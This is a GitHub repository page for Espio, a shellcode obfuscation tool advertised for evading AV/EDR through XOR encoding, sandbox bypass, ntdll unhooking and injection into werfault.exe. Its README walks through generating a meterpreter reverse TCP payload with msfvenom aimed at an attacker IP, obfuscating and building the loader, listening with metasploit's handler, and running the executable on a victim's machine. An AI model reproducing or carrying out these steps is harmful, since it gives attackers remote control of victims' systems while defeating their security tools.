- Notifications
You must be signed in to change notification settings - Fork18
Shellcode obfuscation tool to avoid AV/EDR.
License
Konis-Bros/espio
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
- Obfuscation - base64 encoding and XOR encryption with a randomly generated key.
- Sandbox Bypass - custom sleep function.
- DLL Unhooking - full unhook of ntdll.dll.
- Process Injection - injecting the payload to werfault.exe.
Espio requiresPython3 andVisual Studio to use.
- Clone the repository:
git clone https://github.com/Konis-Bros/Espio.git
- Generate the shellcode. In this demonstration we will be using msfvenom in a kali machine:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode
- Put the shellcode in the cloned repository and use the obfuscator.py tool to obfuscate it:
python3 obfuscator.py shellcode
Note: Our shellcode then be obfuscated toobfuscatedPayload.bin with thekey.bin key and saved in loader/Espio.
Open loader/Espio.sln, the Visual Studio solution file.
Build The project. Note that the executable file will be located at loader/x64/Debug/Espio.exe.
On the attacker's machine, listen for TCP connections on the defined port. In our case, run metasploit's multi/handler on port 1337.
Drop the executable onto the victim's machine and run it.
- In step 2 and 6, create meterpreter session over HTTPS. For more information seeMeterpreter HTTP/HTTPS Communication.
- In step 5, change the build configuration from Debug to Release. Note that the executable file will now be located at loader/x64/Release/Espio.exe.
Espio was examined against:
Distributed under the MIT License. See LICENSE.txt for more information.
About
Shellcode obfuscation tool to avoid AV/EDR.
Topics
Resources
License
Uh oh!
There was an error while loading.Please reload this page.
Stars
Watchers
Forks
Uh oh!
There was an error while loading.Please reload this page.
Contributors2
Uh oh!
There was an error while loading.Please reload this page.